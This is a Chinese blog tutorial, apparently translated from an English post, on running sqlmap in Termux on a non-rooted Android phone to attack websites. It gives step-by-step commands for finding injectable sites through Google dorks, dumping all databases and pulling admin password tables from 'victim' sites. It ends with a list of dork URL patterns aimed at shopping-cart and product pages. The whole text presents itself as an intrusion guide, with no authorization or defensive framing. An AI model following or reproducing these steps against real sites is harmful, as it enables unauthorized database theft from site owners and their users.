如何在没有ROOT访问的Android上执行SQL注入

Posted 2021-04-11 黑白之道

大家好，今天我将向您展示如何在没有root权限的情况下在Android上安装SQLMAP，并使用SQL注入攻击网站。

sqlmap是为Linux设计的，它基于一些基本的SQL注入漏洞，如盲注，时间注入，报错注入等。我个人发现了这个技巧并将它带给你们，这适用于非ROOT手机而且它不需要太多的空间来安装。所以你可以使用它几乎不需要20MB储存。

此外它不需要任何Linux发行版，您可以在小型手机中使用它。而且我亲自在许多手机上进行了测试，它都能正常工作。

附上一条独家视频，它会帮助您更好地理解！

让我们开始吧！

要求

Termux  （Linux终端包含许多内置命令）

Sqlmap  （用于SQL注入）

文件管理器  （查看日志和数据库）

 

Android上的SQLMAP：安装

首先安装上述链接中的所有应用程序并至少运行一次。下载SqlMap的ZIP文件并解压它在SD卡中并更改其名称。

之后，打开Termux并运行命令。

apt update && apt upgrade

它需要一些时间来更新，会提示你需要一些空间。您只需简单安装，按y即可。

如果您使用的是android 6.0+版手机，那么您需要运行此命令，或者如果您使用较低版本，则可以跳过。这不是强制性的，但我建议你运行它。

termux-setup-storage

它会提示允许使用你的内部存储。继续点击允许按钮，然后执行下一步。

packages install python2

该命令将在您的termux中安装Python。输入y以在termux中安装python2。

继续！

可以了，好了！你只需要在手机中找到sqlmap.py脚本。为了实现这一点，首先你需要访问根文件夹，所以首先运行：

cd /

然后输入

cd sdcard

cd ls 

它会显示所有包含的文件。现在你需要找到sqlmap-master （提取的文件夹）。

cd sqlmap-master 

cd sqlmap-master

输入sqlmap-master（上面的命令）两次。

如果您已经将sqlmap-master的名称更改为sqlmap， 那么您可以运行，

cd sqlmap

cd sqlmap-master

您可以借助   “ ls” 命令列出该位置的所有文件。

cd到存储sqlmap.py的sqlmap-master文件夹。现在运行sqlmap你需要下面的命令：

 

python2 sqlmap.py

如果你看到这个红色的sqlmap后就证明你完成了sqlmap的安装。下一步是使用sqlmap入侵网站，需要找到有SQL漏洞的网站。为此，请使用sqlmap google dork来查找网站。

如果您使用的是Google dork，请输入以下内容：

python2 sqlmap.py -g your_keyword 

如果你想使用直接URL，  那么：

python2 sqlmap.py -u your_url

你可以参考sqlmap的官方文档帮助，或者只需键入python2 sqlmap.py -h 查看基本帮助和 python2 sqlmap.py -hh 查看高级帮助。

如果你想破解整个网站的所有的数据库和表格，只需将-a 添加到任一命令中 python2 sqlmap.py -g your_keyword  或  python2 sqlmap.py -u your_url 

在google dork中，它会给你三个选项：

1.是攻击第一个站点，从而产生结果。为了进一步处理，你需要输入“y”。

2.跳到下一个目标，你可以使用“n”。

3.退出时，使用“q”。

设置攻击！

之后它将开始攻击受害者的网站。等到它完成，可能会提示您以下问题，只需点击“y”即可。

之后，它会向您显示几个表格和其他入侵数据。不用担心，当进程完成时，您可以在日志中查看它。
现在，如果你想看到所有的表，你需要运行以下命令：
python2 sqlmap.py -u url --tables

现在只需输入以下命令即可选择要查看的表。一般情况下，我想查看管理表、要查看密码，运行
python2 sqlmap.py -u url -T your_table name
这个命令会将你的表数据和日志文件保存在root文件夹中，这对于普通的非root用户来说是不可访问的，但不用担心，我们可以解决这个终端可以访问的问题，所以我们将把这个文件复制到你的内部存储器中
cp source //sdcard
只需用上述命令替换源代码，它将省略转储文件，现在使用内置文件管理器或使用ES文件管理器导航到文件位置

成功！您在Android上使用sqlmap成功入侵网站。

 

谷歌语法
我在这里给出了一些重要的dorks，所以你可以很容易地找到易受SQL攻击的站点！
add-to-cart.php?ID=

addToCart.php?idProduct=

addtomylist.php?ProdId=

adminEditProductFields.php?intProdID=

advSearch_h.php?idCategory=

affiliate.php?ID=

affiliate-agreement.cfm?storeid=

affiliates.php?id=

ancillary.php?ID=

archive.php?id=

article.php?id=

phpx?PageID

basket.php?id=

Book.php?bookID=

book_list.php?bookid=

book_view.php?bookid=

BookDetails.php?ID=

browse.php?catid=

browse_item_details.php

Browse_Item_Details.php?Store_Id=

buy.php?

buy.php?bookid=

bycategory.php?id=

cardinfo.php?card=

cart.php?action=

cart.php?cart_id=

cart.php?id=

原文：https://www.hackeroyale.com/sqlmap-on-android-nonrooted-tutorial/由华盟网翻译排版，转载请注明华盟网

你可能喜欢